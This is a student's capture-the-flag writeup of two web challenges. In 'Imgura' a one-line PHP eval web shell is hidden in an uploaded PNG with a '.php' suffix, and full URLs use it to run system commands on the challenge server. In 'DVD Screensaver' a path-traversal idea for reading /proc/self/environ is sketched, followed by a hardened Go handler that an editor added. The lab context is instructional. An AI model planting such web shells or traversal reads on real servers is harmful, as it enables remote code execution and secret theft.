###### tags: `NTU`

# HW2 Writeup

## Imgura

### Information Leak

I used the tool denny0223/scrabble to extract the .git repo from the server, then checked out the first commit to restore the hidden files that should be on the server.

### Upload

The trickiest part of this problem is understanding that only files with a .php extension will be included, and there is no way to circumvent this. The trick of adding a %00 (null character) was already removed in PHP 5.

> It took me 2 days to figure out. :cry:

```php
<?php
// Whatever "page" is, ".php" is appended before the include, so only .php files are ever loaded
include ($_GET['page'] ?? 'pages/main') . ".php";
?>
```

Therefore, the only solution is to add a .php suffix to the uploaded file, for example google-400x400.png.php.

I then used a hex editor to write the following PHP code into the PNG file. Since the server blocks `<?php` in the uploaded file, I tried several short tags and found that `<?=` is the one that works.

```php
<?= eval($_GET['cmd']); ?>
```

Finally, I was able to execute code on the server and see the flag using the following links.

https://imgura.chal.h4ck3r.quest/dev_test_page/index.php?page=images/800ed3e4_google-400x4002.png&cmd=system(%27ls%20-la%20/%27);

https://imgura.chal.h4ck3r.quest/dev_test_page/index.php?page=images/800ed3e4_google-400x4002.png&cmd=system(%27cat%20/this_is_flaggggg%27);

### Output of `system('ls -la /');`

![](https://i.imgur.com/fxysirz.png)

## DVD Screensaver

### Path traversal

First, we need to find the value of `SECRET_KEY`. It is stored in an environment variable of the container. I suspect that the call to `ReadFile` in the /static route is exploitable: we could use this route to read the file `/proc/self/environ`, which contains all the environment variables in the container. However, I couldn't figure out how to do it within the deadline.
```go
// Excerpt of the challenge's /static handler: filepath.Join collapses ".."
// segments but does nothing to keep the result inside ./static
http.HandleFunc("/static/", func(w http.ResponseWriter, r *http.Request) {
	filename := strings.TrimPrefix(r.URL.Path, "/static/")
	content, err := os.ReadFile(filepath.Join("./static/", filename))
	...
```
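As an added example (not part of the original writeup or the challenge's code), here is how that handler could be hardened: a helper resolves the joined path and accepts it only if it lies strictly inside the static directory, so a name that climbs above the root is refused before anything is read. `SafeStaticPath`, `ErrUnsafePath` and `staticHandler` are names chosen for this illustration.

```go
package main

import (
	"errors"
	"net/http"
	"os"
	"path/filepath"
	"strings"
)

var ErrUnsafePath = errors.New("requested path is not inside the static root")

// SafeStaticPath joins name onto root and accepts the result only if it is
// strictly inside root. filepath.Join alone collapses ".." segments but does
// nothing to stop the cleaned path from ending up above root.
func SafeStaticPath(root, name string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Absolute names and embedded NUL bytes are never legitimate asset names.
	if filepath.IsAbs(name) || strings.ContainsRune(name, 0) {
		return "", ErrUnsafePath
	}
	joined := filepath.Join(absRoot, name)
	// Compare with a trailing separator so "static2/x" cannot pass as "static".
	// This does not follow symlinks; use filepath.EvalSymlinks if root may contain them.
	if !strings.HasPrefix(joined, absRoot+string(filepath.Separator)) {
		return "", ErrUnsafePath
	}
	return joined, nil
}

// staticHandler is a hypothetical hardened counterpart of the handler quoted above.
func staticHandler(w http.ResponseWriter, r *http.Request) {
	name := strings.TrimPrefix(r.URL.Path, "/static/")
	path, err := SafeStaticPath("./static", name)
	if err != nil {
		http.NotFound(w, r) // same response as a missing file: reveal nothing
		return
	}
	content, err := os.ReadFile(path)
	if err != nil {
		http.NotFound(w, r)
		return
	}
	w.Write(content)
}
```

Register it with `http.HandleFunc("/static/", staticHandler)` in place of the inline closure.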